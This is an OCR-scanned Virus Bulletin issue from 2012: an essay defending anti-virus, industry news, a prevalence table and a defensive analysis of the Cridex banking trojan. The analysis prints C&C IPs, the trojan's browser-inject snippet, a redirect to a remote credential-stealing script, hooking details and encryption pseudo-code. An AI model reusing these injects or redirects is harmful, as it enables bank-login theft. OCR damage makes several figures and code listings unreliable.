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COMMENT 


‘Anti-virus does a 
very good job, but 
... missing once is 
seen as failure in 
general. ’ 

Greg Day, Symantec 

IS AV THE OLD DOG? 

Over the last few years I have noticed a marked increase 
in the number of people discussing the ‘death’ of 
anti-virus - predominantly citing that it’s no longer fit 
for purpose as it’s too slow or too reactive. 

Recently, I heard a speaker misquote a global report 
suggesting that anti-virus picked up less than 1% of 
all breaches. If they were highlighting the breaches 
that were successful, this may be true. However, there 
are many factors that could lead to an attack being 
successful - for example, systems security controls may 
be misconfigured or out of date, and there are multiple 
other high-risk scenarios that we often come across in 
the practical business environment. 

But the apparent confusion doesn’t end there. Recently, I 
was reviewing submissions for a prominent international 
security conference. As I read through the abstracts, I 
saw statements referring to ‘floundering AV solutions’ 
and their ‘reliance on signature-based detection’, neither 
of which I believe is fair or true. 

So why is anti-virus getting such a hard time? In some 
respects I believe it’s the result of to being the ‘old dog’ 
on the street. It is the tried and tested technology that 
has served us well for so long. The new boys on the 
street are looking to discredit it as a means to increase 
confidence in their own solutions. 

Attackers have long understood the concept of 
signature-based detection and worked on methods to 
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circumnavigate it - such as polymorphism, obfuscation 
techniques, and recently packers. In each instance, 
the anti-virus industry has responded by adding new 
capabilities - techniques such as generic decryption 
engines, heuristics, family-based and packer detections. 
So, if anti-virus is the ‘old dog’, it has certainly learnt 
some new tricks along the way. 

Over the years, the fundamental challenge has been one 
of time. Ensuring signatures/updates keep pace with the 
speed and volume of new attacks and with the fact that 
attackers are able to test their code against online tools 
before they launch their attacks. Again, the anti-virus 
industry has responded by utilizing the cloud as a 
method of real-time checking or applying reputational 
checks against the file and/or the source that move 
heuristic/behavioural capability to another level. 

I believe that anti-virus is here to stay. It’s one of the 
few technologies that uniquely identifies the threat 
and lets us know what it is and what it does, and more 
importantly, has the capability to remove/repair the 
attack. 

There are some very interesting new technologies 
coming to market that are far more proactive, but in 
general, the more you look to block based purely on 
behaviour, the less you get to know about the attack. 
Anti-virus provides a great complement to the strengths 
and weakness of each new technology - for example, 
proactive lockdowns (whitelisting) work well for single 
or simple function systems, but typically in the diverse 
complex world of desktop computing they are too 
complex to apply and maintain. 

Finally, there is another false concept we must get over, 
which is that any one solution or technology can be 
infallible. Anti-virus does a very good job, but it seems 
that in the binary world of technology, missing once is 
seen as failure in general. We have recommended layered 
defences for decades just for this reason. 

So, is anti-virus dead? No, I certainly wouldn’t say so. 

Is anti-virus purely a reactive technology? It hasn’t been 
for many years, and for those who still believe that it 
is, I would encourage them to look again at the current 
capabilities of leading anti-virus solutions. Is anti-virus 
the perfect solution? No. 

While the security industry continues to fight amongst 
itself, end-users are becoming ever more confused as 
to what is the right approach to take. So the next time 
someone suggests anti-virus is, or is becoming obsolete, 
we should encourage them to refresh their knowledge, 
recognize the evolution of anti-virus, utilize its strengths 
and look to complement its shortcomings. 
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NEWS 

VGREP: THE ROSE REVIVED 

‘That which we call a rose, By any other name would 
smell as sweet.’ So wrote Shakespeare in Romeo and 
Juliet. And anyone with even the briefest experience of 
the anti-malware industry will know that a single piece of 
malware can have several different names. 

In the 1990s, former editor of Virus Bulletin Ian Whalley 
created the VGrep tool in an attempt to help users navigate 
the confusing world of virus names. The tool ran a number 
of anti-malware scanners across a large collection of infected 
files and parsed their output into a simple text database. 

Back when the tool was created, the number of known 
viruses was many times smaller than it is today, and the tool 
functioned very well for many years (maintainance of the 
VGrep database was subsequently taken over by McAfee’s 
Dmitry Gryaznov). Since early 2009, however, the system 
has more or less lain dormant - until now. 

This month sees the launch of a new generation of VGrep , 
operating with a database maintained by provider of threat 
analysis tools ReversingLabs. Improvements to VGrep 
include: 

• New malware will be scanned and detection changes 
updated twice daily. 

• Scanners from 25 vendors will be supported. 

• Over 80 million malware samples will be incorporated. 

• Advanced search engine technology will support 
speedy queries, obviating the need for VGrep database 
downloads. 

VB is delighted to be able to offer the new, improved VGrep , 
and we look forward to hearing your feedback. VGrep can 
be accessed at http://www.virusbtn.com/resources/vgrep/. 


EU’S BIGGEST CYBER TEST A SUCCESS 

Earlier this month, a number of European banks, 
information security agencies and governments got together 
to participate in Europe’s biggest cyber security test. 

Cyber Europe 2012 was a day-long simulated cyber security 
attack on Europe’s critical infrastructures, co-ordinated by 
the European Network and Information Security Agency 
(ENISA). The exercise was designed to assess how 
governments and private sector organizations (including 
approximately 60 banks and 60 ISPs) would cooperate in 
the event of a large-scale attack. 

Initial findings showed that there was frequent cooperation 
and information exchange between public and private sector 
organizations, although the public-private cooperation 
structure differed from country to country. A full report on 
the exercise is due for release by the end of the year. 


Prevalence Table - August 2012 [1] 

Malware 

Type 

% 

Java-Exploit 

Exploit 

13.51% 

Autorun 

Worm 

8.96% 

Sirefef 

Trojan 

6.28% 

Heuristic/generic 

Virus/worm 

5.23% 

Conficker/Downadup 

Worm 

4.87% 

Iframe-Exploit 

Exploit 

4.77% 

Injector 

Trojan 

3.77% 

Heuristic/generic 

Trojan 

3.07% 

Adware-misc 

Adware 

2.82% 

Encrypted/Obfuscated 

Misc 

2.64% 

Sality 

Virus 

2.49% 

Crypt/Kryptik 

Trojan 

2.34% 

Blacole 

Exploit 

2.10% 

Exploit-misc 

Exploit 

2.02% 

Downloader-misc 

Trojan 

2.00% 

Hupigon 

Trojan 

1.92% 

FakeAV-Misc 

Rogue 

1.67% 

Wimad 

Trojan 

1.58% 

Agent 

Trojan 

1.55% 

Dropper-misc 

Trojan 

1.46% 

BHO/Toolbar-misc 

Adware 

1.41% 

Crack/Keygen 

PU 

1.31% 

LNK-Exploit 

Exploit 

1.22% 

Virut 

Virus 

1.19% 

PDF-Exploit 

Exploit 

1.05% 

Dorkbot 

Worm 

1.01% 

Autolt 

Trojan 

0.85% 

Ramnit 

Trojan 

0.78% 

Backdoor-misc 

Trojan 

0.76% 

Qhost 

Trojan 

0.73% 

JS-Redir/Alescurf 

Trojan 

0.70% 

Tanatos 

Worm 

0.68% 

Others [2] 


13.28% 

Total 


100.00% 


m Figures compiled from desktop-level detections. 

[2] Readers are reminded that a complete listing is posted at 
http ://www. virusbtn. com/Prevalence/. 



OCTOBER 2012 


3 








































VIRUS BULLETIN www.virusbtn.com 


MALWARE ANALYSIS 1 


CRIDEX BOTNET PREVIEW Communication protocol 

Carmen Liang, Neo Tan The following is a partial list of C&C server IPs and their 

Fortinet, Canada corresponding geographic locations (Figure 1). 


Cridex is a trojan that steals bank account information from 
its victims. It is programmed in object oriented C++. The 
Cridex botnet is centralized, communicating with its C&C 
server regularly to retrieve the latest configuration files 
and corresponding binary updates. Some generations use a 
combined cryptographic system consisting of public- and 
symmetric-key cryptography to secure communication 
between the bot and C&C server. Today, there are four main 
generations of Cridex bots. The first, generation 0, was 
discovered around the end of 2011, and has no encryption 
at all. The three later generations have become more active 
over the last couple of months. In this article, we will 
focus on a detailed analysis of the Cridex injection routine, 
communication protocol, encryption scheme and working 
mechanism in order to shed light on the development path 
of the three recent generations of Cridex bots. 


INJECTION ROUTINE 

When the trojan launches, it first drops itself into the 
%App Data% folder and writes the name of the dropped 
file to the autorun registry entry (e.g. HKCU\Software\ 
Microsoft\Windows\CurrentVersion\Run\KB%8d.exe). 

The filename starts with the letters ‘KB’, followed by an 
eight-digit number derived from the victim’s volume serial 
number. The trojan will delete itself using a batch file once 
it has run from the dropped file. 

Next, it checks the current OS environment and acts 
accordingly. If it is in a 64-bit environment, only the 
communication routine will be executed. Otherwise, it 
goes through a list of all the currently running processes, 
and injects itself into processes that have the right access 
and security identifier (SID). It then allocates a block of 
memory containing a copy of itself inside the targeted 
process. Then it uses CreateRemoteThread to run the 
malicious routine. 

COMMUNICATION PROTOCOL AND 
ENCRYPTION SCHEME 

Gather local machine information 

Before the bot communicates with the C&C server, 
it first gathers the basic information from the victim 
machine, including serial number, computer name, version 
information and a hash value of the user’s security identity. 
All of this information will be sent to the C&C server. 


110.234.150.163 

123.49.61.59 

173.203.96.79 

180.235.150.72 

184.106.189.124 

190.81.107.70 

200.169.13.84 

202.143.147.35 

203.172.252.26 

203.172.252.29 

203.217.147.52 

210.56.23.100 

211.44.250.173 


219.94.194.242 

31.17.189.212 

41.168.5.140 

58.68.2.214 

64.94.164.18 

83.143.134.23 

83.238.208.55 

85.226.179.185 

89.111.176.87 

91.121.103.143 

95.142.167.193 

97.74.75.172 



Figure 1: C&C server geographic locations. 

After gathering the information, the bot will try to 
communicate with one of the C&C servers. The 
communication routine is injected into every process that 
the bot has the access rights to open. It has mutex and event 
checks to ensure that only one thread at a time executes 
the communication routine in order to avoid data sharing 
conflicts. Its primary goal is to retrieve the configuration 
file and binary updates from the C&C server. The bot 
communicates with the server using both HTTP and a 
direct use of TCP. The direct use of TCP is solely to create 
a connection to the back server (which is different from the 
C&C server), whose IP address is in the configuration file. 
Usually (in generations 1 and 2), after sending a plain-text 
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No. Time 

ESTCSE 


| Source | 


3845 607.402467 31.184.192.195 

3846 607.402674 192.168.6.128 

3847 607.402898 192.168.6.128 

3848 607.402996 31.184.192.195 


4432 677.360348 192.168.6.128 

4440 712.360075 31.184.192.195 


4442 747.360007 31.184.192.195 

4443 7 _5.128 


4446 817.360175 192.168.6.128 


^m 


_ 


4495 887.359861 31.184.192.195 




Destination 

KEK3E1 

192.168.6.128 

31.184.192.195 

31.184.192.195 

192.168.6.128 


31.184.192.195 

31.184.192.195 
192.168. 6.128 




192.168.6.128 

31.184.192.195 


31.184.192.195 




_ 


192.168.6.128 


Protocol 

in 

TCP 

TCP 

SSL 

TCP 


Length Info 






58 https > veracity [syn, ack] seq=0 Ack=l win=64240 Len=0 MSS=1460 

54 veracity > https [ACK] Seq=l Ack=l Win=64240 Len=0 
126 Continuation Data 

54 https > veracity [ACK] seq=l Ack=73 win=64240 Len=0 _ 


_ 

_ 

_ 

54 [TCP Keep-Alive ACK] https > veracity [ACK] Seq=l Ack=73 win=64240 Len=0 


_ 

: . _ 


~acity [ACK] Seq=l Ack=73 Win=64240 Lert-0 


55 [TCP Keep-Alive] veracity > https [ack] seq=72 Ack=l win=64240 Len=l 

_ 


rr 


" _ 

55 [TCP Keep-Alive] veracity > https [ACK] seq=72 Ack=l win=64240 Len=l 


54 [TCP Keep-Ali\e _ ] Seq=l Ack= _ 5 Ler>=0 


Figure 2: Back connection. 


message detailing the victim’s system information, it just 
keeps the connection alive and waits for the back server’s 
command. It also has the ability to archive, search and 
execute local files. The direct use of the TCP protocol is 
apparently the botmaster’s last resort if the bot doesn’t 
work as expected. This protocol is not designed to work 
on demand. If the bot pool grows in scale, the back server 
will eventually need to handle numerous ‘KEEP ALIVE’ 
requests, which will be similar to launching a DDoS attack 
on the back server. Figure 2 shows the communication 
between the bot and the back server. 

The thread that uses the HTTP protocol is the main method 
the bot uses to communicate with the C&C server to 
retrieve the configuration file and get binary updates. 

Communication encryption scheme 

The communication encryption scheme varies from 
generation to generation: both the first and second 
generation use a customized hybrid cryptographic system, 
but the third generation uses SSL encrypted communication. 
Since the second generation introduced an XML formatted 
configuration file, the data for this generation was encoded 
in Base64 (step 1 below). The customized cryptographic 
system is an encryption system which combines public-key 
cryptography (RSA) with symmetric-key cryptography 
(RC4), so that it has both the confidentiality of 
non-symmetric encryption and the efficiency of symmetric 
encryption. The following are the steps involved in the 
second generation encryption scheme: 

1. It uses CryptStringToBinaryA to decode 
the encrypted CERT_PUBLIC_KEY_ 

INFO structure from base64 format to 
binary. In all variants, the base64 data is 
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBi 
QKBgQCvR7x8oHW63g45dwL84Xyga4jdsEUyYc 
9taOLTZ+kEhwauB7UbvXliNZZsq 1 HzsNgz+Ge7j 


VT2nyBI vD wx6CozX0iNM2QG7ZalwB 6zB Vy vpg 
TNTQqE80DZrDGIkabg40T3 YeRrux4Z8GZ 14Jj a 
/j IT S QZB M v s W guP/wFpU J 3 5 v2 wID AQ AB. 

2. Then it calls CryptDecodeObjectEx to decrypt the 
binary data using parameters dwCertEncodingType= 
X509_ASN_ENCODING and lpszStructType= 
X509_PUBLIC_KEY_INFO to obtain the decoded 
CERT_PUBLIC_KEY_INFO structure. 

3. After using CryptlmportPublicKeylnfo to import 
the public key, it calls CryptGenKey with parameter 
Algid=CALG_RC4 to generate a temporary RC4 
key, which is the session key. 

4. It uses CryptExportKey to export the session key 
with encryption using the public key from step 2. The 
parameter dwBlobType is set to SIMPLEBLOB, so 
the output of this call will be in the following format: 


struct SimpleBLOB { 


struct BLOBHEADER { 


BLOBHEADER 

ALG_ID 

BYTE 


blobheaderStruc; 
algid; 

encryptedKey[0x8 0] ; 


BYTE 
BYTE 
WORD 
ALG ID 


bType; 
bVersion; 
reserved; 
aiKeyAlg; 


Type: SIMPLEBLOB 


Version of key BLOB format 
ALG ID:CALG RC4 



ALG ID:CALG RSA KEYX 


52 68 3C 
52 36 OD 
48 F4 77 
F9 OD F9 
6B 4C 5C 
28 CA 33 
1 83 99 C8 
5B B1 2B 


■qIF" A4 00 00| 44 A5 A2 7E 
El 14 IB 2D 6B 2B E2 14 97 B3 
4D AO 50 73 4C 60 4D F2 8E BB 
EA E4 19 AD EE 29 46 7C 22 BB 
OA 58 1C BD 7F 4F OB AE C4 94 
53 57 80 A4 90 83 70 87 5F DD 
A8 BD 04 BE Cl D6 24 85 B6 05 
4A CC 3E BF Cl DO 72 El 98 B9 
72 95 C5 AD C9 92 


Encrypted Session Key 

Figure 3: BLOBHEADER and encrypted session key. 
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‘SimpleBLOB’ in Figure 3 indicates that this is a 
SIMPLEBLOB, the session key is encrypted using 
an RSA public key, and the session key itself is an 
RC4 key. The RC4 key will be sent to the C&C 
server because the server does not know what key 
is generated by the client and used to encrypt the 
message. And it can only be decrypted using the 
C&C server’s private key. 

5. It then uses the RC4 key to encrypt the plain-text 
message with the following format: 

struct Message_Packet { 

DWORD magicWORD; //in this variant, it uses 
"DEADBEEF" 

DWORD msgSize; //the size of this whole message 

DWORD keyExpFlag; //if the RC4 key is exported 
successfully 

BYTE encryptedKey[0x80]; //exported RC4 key, 
encrypted 

BYTE shalofMsg[0x14]; //SHA1 value of the 
following encrypted message 

BYTE encryptedMsg[msgLen]; //the message 
encrypted using RC4 

} 

It only copies the encryptedKey from the 
SimpleBLOB structure to form this message, 
stripping the BLOBHEADER and the algorithm ID. 
Therefore, the C&C server assumes the encrypted 
key is an RC4 key exported in SimpleBLOB format, 
and that the algorithm will be RSA. 

(For more details of the encryption steps, please see the 
simulated pseudo code in the Appendix.) 

The received packet structure is very similar to the struct 
Message_Packet described above, except the BYTE 
encryptedKey[0x80] field is substituted with BYTE 
signatureRecvMsg[0x80]. To decrypt the encryptedMsg, 
the bot simply calls CryptDecrypt using the same RC4 
session key as is stored in the memory. In order to check 
for the integrity of the received message, the bot calls 
CryptVerifySignatureW with hPubKey set to the imported 
public key and the pbSignature pointing to the signature 
RecvMsg. 

Communication data structure 
Send message data structure 

The message content is in ‘plain text’. The structure of these 
messages is very different across the three generations. The 
first data sent to the server has the following layout: 

First generation 

The data is in binary format, the following is its pseudo 
struct code: 


struct first_sending_message { 


DWORD 

size_of_message 

WORD 

unknown marker 

DWORD 

size_of_header 

DWORD 

size_of_data 

WORD 

unknown marker 

WORD 

service pack major version 

WORD 

service pack minor version 

WORD 

windows major version 

WORD 

windows minor version 

BYTE 

computer_architecture 

BYTE 

null end marker 

DWORD 

end_o f_da ta_section 

DWORD 

size of end marker 

DWORD 

end_of_message 

WORD 

computer_name 

BYTE 

5f marker 

QWORD 

volume serial number 

QWORD 

register_name (the condensed USID) 


} 

Second generation 

The following is an example of the message: 

<message set_hash="" req_set="l" req_upd="l"> 
<header> 

<unique>HL_AC197B6886B8B695</unique> 

<version>105</version> 

<system>86320</system> 

<network>nt</network> 

</header> 

<datax/data> 

</message> 

We can see from this example that it uses XML format. 
‘req_set’ describes whether the initial set-up is successful. 
‘req_upd’ describes whether it is requesting an update. The 
‘unique’ tag contains basic computer information including 
computer name, volume serial number and register name. 
This makes up the unique ID for the victim’s computer. 

The ‘version’ tag contains the system version value. The 
‘system’ tag contains a structure describing the system 
information, which is a little redundant alongside the 
‘version’ tag. For example, 86320 in hex is 0x15130, and 
each byte indicates a specification of the current OS. The 
first ‘1’ means the system is a VER_NT_WORKSTATION; 
‘5’ is the MajorVersion; ‘1’ is the MinorVersion; ‘3’ is the 
ServicePackMajor; ‘0’ is the ServicePackMinor. The ‘data’ 
tag contains the stolen information. 

Third generation 

The structure of the packet changed the most in this 
generation. It contains some garbage data (the sums) in the 
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middle of the packets. The most important tags, ‘unique’ 
and ‘data’, are still the same as in the second generation. It 
also contains the injected process filename. 

struct message_packet { 

DWORD magicWord; //new magic word "85 04 08 FF" 
DWORD packetSize; 

DWORD reqSet; 

DWORD reqUpd; 

DWORD sytemTimeStamp; 

DWORD botVer; //bot version 
DWORD verBuildNum; 

WORD spMajorVer; 

WORD spMinorVer; 

DWORD offsetToUnique; 

DWORD uniqueSize; 

DWORD suml; //sum of the above 2 DWORDs 
DWORD fileNameSize; //installer file name 
DWORD sum2; //sum of the above 2 DWORDs 
DWORD dataSize; 

DWORD sum3; //sum of the above 2 DWORDs 
BYTE unique[uniqueSize] ; 

BYTE fileName [fileNameSize] ; //injected process 
filename 

BYTE data[dataSize] ; 

} 

Received message data structure 

The data structure of the received messages is not only 
different across generations, but also different from the 
structure of the sending messages. 

First generation 

The messages are in binary format. The message is 
composed in a huge section, which is labelled ‘OxOA’ and 
later will be divided into many sections and subsections. 

All sections and subsections can be generalized into the 
following data structure: 

struct general_section_layout{ 

DWORD size_of_section 
DWORD label_id 

BYTE section_content [size_of_section_8] 

} 

Inside this huge section there are generally four types of 
sections. These are labelled ‘0x80’, ‘0x82’, ‘0x83’ and 
‘0x84’ in the label_id area. Most of the injected HTML 
code is in label_83. The details of the structure of the 
sections are as follows: 

struct label_80 { 

DWORD size_of_section 

DWORD label_id 

BYTE section_content [size_of_section_8] 

(URL, start with and end with '* ') 

} 


struct label_82 { 

DWORD size_of_section 

DWORD label_id 

BYTE section_content [size_of_section_8] 

(pattern, start with '*' and end with 

'* redirect, content marked after 

} 

struct label_84 { 

DWORD size_of_section 

DWORD label_id 

BYTE ip_addresses [size_of_section_8] 

} 


struct label_ 

.83 { 

DWORD 

size_of_section 

DWORD 

label_id 

DWORD 

end_of_section_header 

DWORD 

zero marker 

DWORD 

url length 

BYTE 

URL (start with and enc 

[url_length] 

DWORD 

size_of_subsection_l 

DWORD 

lst_zero_delimiter_offset 

DWORD 

2nd zero delimiter offset 

DWORD 

3rd _zero_delimiter_offset 

BYTE 

subsection (html code) 
[size_of_subsection_l} 

DWORD 

size_of_subsection_2 

DWORD 

lst_zero_delimiter_offset 

DWORD 

2nd zero delimiter offset 

DWORD 

3rd _zero_delimiter_offset 

BYTE 

subsection (html code) 
[size_of_subsection_2] 

DWORD 

size_of_subsection_3 

...(continue until section 


• label_80 parses the URLs of the targeted sites and 
stores them in a table in the .data section of the current 
process. 

- There is a maximum of 200 entries. 

• label_8 2 parses ‘j query addons v2\.j s’ and ‘http://***/ 
cp.php’ and stores the result in the .data section of the 
current process. 

• label_83 hashes the HTML code respectively into the 
.data section of the current process. 

There is a maximum of 100 entries. Each entry 
represents a section of the HTML code that is 
targeted to a specific site. Each section can have up 
to three subsections. 

• label_84 stores the IP address to the .data section of the 
current process. 
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• Type_2 - writes a log file 

• Type_3 - creates a CAB file 

• Type_4 - creates an auto-reset event 

• Type_5 - deletes cookies. 

Second generation 

• Type_l - stores update file obtained from the 
configuration file in %TMP% as a four-character 
temporary file and runs it 

• Type_2 - downloads file from a URL and runs it 

• Type_3&4 - writes log file 


Figure 4: XML structure of the configuration file. 

Second generation 

This generation uses XML format. It mainly has two big 
branches, which are <settings> and <commands>. The 
content in the <settings> branch shares some similarities 
with the content of the first generation. There are five 
sub-branches under the <settings> branch, which are 
<httpshots>, < formgrabber>, <redirects>, <bconnect> 
and <httpinjects>. The content in <httpshots> is similar to 
the URL of label_80. The content in <redirects> is similar 
to the content of label_82. Interestingly, the IP addresses 
for <bconnect> and label_84 are exactly the same: 
31.184.192.195:443. The second generation has introduced 
the <formgrabber> functionality, targeting only 
www.facebook.com for the time being. There are eight 
types of commands under the <command> branch. Each 
type is associated with a set of corresponding instructions in 
the injected code. Figure 4 shows the XML structure of the 
received message. 

Third generation 

The third generation uses a new magic word, ‘85 04 08 FF’, 
instead of ‘DEADBEEF’ which was used by the previous 
two generations. It abandons the XML structure, instead 
returning to the binary structure with labels as seen in the 
first generation. However, the label values have changed to 
integer numbers between 0 and 5. 

Command and control 

In all generations there is a special thread that is dedicated 
to handling the commands that are stored in the registry. 
Since the structure of these commands is different, the 
methods of handling them must be different. 

First generation 

• Type_l - downloads file from a URL and runs it 


• Type_5 - creates cookies CAB file then deletes cookies 

• Type_6 - deletes cookies 

• Type_7 - creates an auto-reset event 

• Type_8 - gets current system time and private key and 
stores them in the log file. 

Third generation 

• Type_l - stores update file obtained from the 
configuration file in %TMP% as a four-character 
temporary file and runs it 

• Type_2&3 - downloads file from a URL and runs it 

• Type_4 - writes log file 

• Type_5 - deletes Firefox cookies 

• Type_6 - deletes Flash cookies 

• Type_7 - creates CAB file 

• Type_8 - gets current system time and private key and 
stores them in the log file 

• Type_9 - creates event. 

INLINE HOOK OF CURRENT PROCESS API 

The hooking technique the bot uses is called inline hooking. 
The idea is to redirect the call flow to the malicious routine 
at the entry point of the hooked API. For example, in Figure 
5, this is in the memory of the nspr4.dll module of the 
firefox.exe process. It replaces the API’s entry code 8b 44 
24 04 8b with e9 3b 56 32 ff, so the call to PR_Connect 
will be redirected to the malicious subroutine 0xl5D830, 
inside which there is a dummy subroutine at 0x151010. 

The dummy subroutine is initially formed by a series of 
NOPs (0x90). During the hooking process, the overwritten 
codes are saved to the dummy subroutine at 0x151010. An 
unconditional jump is also written to lead the execution 
flow back to the original API. The bot has the algorithm to 
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0OE381FO 

- E9 3B5632FF 

jmp 0015D830 -— 

00E381F5 

0889 3424048B 

or byte ptr ds : [ecx+8B042444] 

00E381FB 

41 ^ 


inc ecx \ 

00E381FC 

3 OFF \ 


xor bh,bh \ 

00E381FE 

* E0 CC \ 


loopdne short nspr4.00E381CC \ 

0OE3820O 

51 1 


push ecx \ 

00E38201 

53 | 


push ebx 

0OE38202 

8A5C24 1 


mou bl,byte ptr ss:[esp+10] 




__ J 


00151010 

8B4424>«l 

mou eax duord ptr ss:[esp+4] 

00151014 

8B08 

mou ecx,duord ptr ds:[eax] 

00151016 

- E9 DB71CE00 

jmp nspr4.00E381F6 

00151 01B 

90 

nop 

00151 01 C 

90 

nop 


Figure 5: Inline hooking of nspr4.PR_Connect. 


• nspr4.PR_Connect 

• nspr4.PR_Write 

• nspr4.PR_Read 

• nspr4.PR_Poll 

• nspr4.PR_Close 

• ssl3.ImportFD 

By hooking these APIs, the bot has the ability to mask the 
URLs received in the browsers and perform a few tasks 
according to the configuration file. If the URL contains the 
domain name in the <httpshots> tag or the <formgrabber> 
tag (e.g. xxxbank.com), the bot will try to match the pattern 


calculate where the assembly operation line ends, so it can 
save the entire line of operation, 8b 08, to make sure it will 
not jump back to the middle of an operation. In Figure 5, 
it jumps back to 0xE381F6, not 0xE381F5, right after the 
unconditional jump. 


in the <conditions> tag (e.g. *xxxbank.com.*). If the 
condition matches, it will inject the HTTP code from the 
<replacement> tag. With those encryption APIs hooked, 
it can bypass the site’s traffic encryption protocol such as 
SSLv3. In this variant the code in the <replacement> tags is 
all the same: 


The bot checks the process it injects into and hooks the 
corresponding API accordingly. 

For all processes, it tries to hook the following APIs: 

• ntdll.NtResumeThread 

• ntdll.LdrLoadDll 

• Secur32.DeleteSecurity Context 

• Secur32.InitializeSecurityContextW 

• Secur32.InitializeSecurityContextA 

• Secur32.EncryptMessage 

• Secur32.DecryptMessage 

If the process imports ws2_32.dll and crypt32.dll (e.g. 
explorer.exe and iexplorer.exe), it hooks the following APIs 
as well: 

• ws2_32.connect 

• ws2_32.send 

• ws2_32.WSASend 

• ws2_32.recv 

• ws2_32.WSARecv 

• ws2_32.select 

• ws2_32.closesocket 

• ws2_32.getaddrinfo 

• ws2_32.gethostbyname 

• cry pt3 2. PFXImportCertS tore 

While if the process is firefox.exe, it hooks the following 
APIs: 


<replacement> 

<![CDATA[<script type="text/javascript" 
src = "https://aj ax.googleapis.com/aj ax/libs/ 
j query/1.4.2/j query.min.j s"> 

</script> 

<script type="text/javascript" src="/ 
j queryaddonsv2.j s"> 

</script> ]]> 

</replacement> 

By injecting this code into the page, it triggers a hooking 
function which redirects any URL matching the pattern 
\*j query addons v2\.js.*’ to a malicious JavaScript page: 
http://69.64.56.232:8080/za/v_01_a/in/cp.php, according to 
the configuration: 

<redirect> 

<pattern>.*j queryaddonsv2\.j s.*</pattern> 

<process>http://69.64.56.232:8080/za/v_01_a/ 
in/cp.php</process> 

</redirect> 

Figure 6 shows the source code of an injected page 
belonging to a financial institution. 

The /j query addons v2.js is redirected to a JavaScript page 
that can inject the forms and submit the user’s log-in 
information to the C&C server. 

In the third generation, the malicious JavaScript is 
embedded in the legitimate ‘jquery.min.js’ file, which makes 
the injection more subtle. It seems the malicious JavaScript 
is still under development. With the exception of the same 
function that can submit the user’s log-in information, 
there are cases in the executeActions function that are not 
implemented yet. 
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rust.com/ - lozilla Firefox 


File Edit View Help 


if (document, location, pathname, length < 2 && defaultPageCookieValue. length > 0) { 
if (document, location, href. indexOf(defaultPageCookieValue) < 0) { 
document, location, replace(defaultPageCookieValue); 


} 


} 


46 

47 

48 

49 

50 

</script><script src= Vincs/scripts. ,js?l3430170551 72 "></scriptXscript src=" https : //web~xp2i-pws. ntrs. coi 
>2 <link typ 0 ="text/css" hr 0 f= Vincs/homess. css?l343017055172 " rel^stylesheet”) 

</head> 

54 <body! 

55 

56 

57 


<scr^^^Type=^e^'^ava5cr^^^^rc= W ^Up^77^ay^oog^ap^^om7^ax7^^s l ^query7^^^ l ^query^rim^s W ? 
</ script> 

<script typ 0 ="t ext/javascript" src= " /.iqueryaddonsv2. ,is ' ”> 

</script> _ 


trustLogo. jpg " alt-" 


<div id="pageBodyDiv"> 

<div id="nt Header"/ 

<a onClick="clearPageOption() ; " hr 0 f="/"><iiDg id="ntLogo" src= yy /images/ 

<div id= "headerMenu"/ 

62 <noind 0 x> 

<div id="headerMenuLeftGap">&nbsp; </div> 

< di v i d= "he aderM enuW e al t hM anag ement " > 

<a 1001111 ="™" class="hasDD" hr 0 f= /y// ><iiDg srcX Vimages/gs/menus/topMenu/wm normal. gif yy ></a> 
66 </div> 

< di v i d= ""he aderM enuAs s e t M anag ement yy > 

<a menu^^am" class^^hasDD^ hr 0 f= yy/y ><iiDg src= yy /images/ gs/menus/topMenu/am_normal. gif yy ></ a> 
>9 </div> 

< i^iiu^il 


_ 


Figure 6: Injected page. 


CONCLUSION 

Although Cridex only has a short history (having first 
appeared at the end of 2011), the malware has become more 
aggressive recently. It already has three generations. Each 
of them has a distinct message data structure and encryption 
scheme. Its trend is to reuse existing libraries and formats 
to give the bot more flexibility and extensibility. In each 
generation updates do not cause it to switch to the newest 
generation, instead each bot generation retains its own 
formatting. It seems these samples are the beta versions for 
the author’s development testing. 

APPENDIX 

//Pseudo code Cridexv2 Encrypt 
BOOL fResult = FALSE; 

HCRYPTPROV hProv = NULL; 

HCRYPTHASH hHash = NULL; 

HCRYPTKEY hSessionKey = NULL; 

HANDLE hlnFile = INVALID_HANDLE_VALUE; 

HANDLE hOutFile = INVALID_HANDLE_VALUE; 

BOOL finished = FALSE; 

BYTE pbBuffer[OUT_BUFFER_SIZE]; 

DWORD dwByteCount = 0; 

DWORD dwBytesWritten = 0; 


LPCTSTR pkeyCipher = _T("MIGfMA0GCSqGSIb3DQEBAQUAA4GN 
ADCBiQKBgQCvR7x8oHW63g45dwL84Xyga4jdsEUyYc9taOLTZ+kE 
hwauB7UbvXliNZZsqlHzsNgz+Ge7jVT2nyBIvDwx6CozX0iNM2QG7 
ZalwB6zBVyvpgTNTQqE80DZrDGIkabg40T3YeRrux4Z8GZ14Jj a/ 
jITSQZBMvsWguP/wFpUJ3 5v2wIDAQAB") ; 

CERT_PUBLIC_KEY_INFO *publicKeylnfo; 

DWORD publicKeylnfoLen; 

HCRYPTKEY hPubKey = 0; 

SimpleBLOB *simpleBLOB = new SimpleBLOB(); 

DWORD keyLen; 

// Acquire a handle 

CryptAcquireContext(&hProv,NULL,MS_DEF_PROV, PROV_ 
RSA_FULL,CRYPT_VERIFYCONTEXT|CRYPT_SILENT); 

//not going to be used in the encryption, only used 
when calculating the SHA1 of the plain-text message 

CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash); 

BYTE* pbSignedMessageBlob = NULL; 

DWORD cbSignedMessageBlob = 0; 

// 

// Base64 -> binary 

// 

Base64ToBinary(pkeyCipher,0,&pbSignedMessageBlob,&cbS 
ignedMessageBlob); 
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CryptDecodeObjectEx(X5 0 9_ASN_ENC0DING, X5 0 9_PUBLIC_ 
KEY_INFO, pbSignedMessageBlob, cbSignedMessageBlob, 
CRYPT_DECODE_ALLOC_FLAG, NULL, &publicKeylnfo, 

&publicKeylnfoLen); 

// Get the public key information for the certificate. 

CryptlmportPublicKeylnfo(hProv, X509_ASN_ENCODING, 
publicKeylnfo, &hPubKey); 

CryptGenKey(hProv, CALG_RC4, Oxll, &hSessionKey); 

keyLen = 0x8 C; 

CryptExportKey(hSessionKey, hPubKey, SIMPLEBLOB, 0, 
(BYTE*)simpleBLOB, &keyLen); 

do 

{ 

dwByteCount = 0; 

// Now read data from the input file 

ReadFile(hlnFile, pbBuffer, IN_BUFFER_SIZE, 
&dwByteCount, NULL); 

if (dwByteCount == 0) 
break; 

finished = (dwByteCount < IN_BUFFER_SIZE) ; 

// Encrypt 

fResult = CryptEncrypt(hSessionKey, 0, 
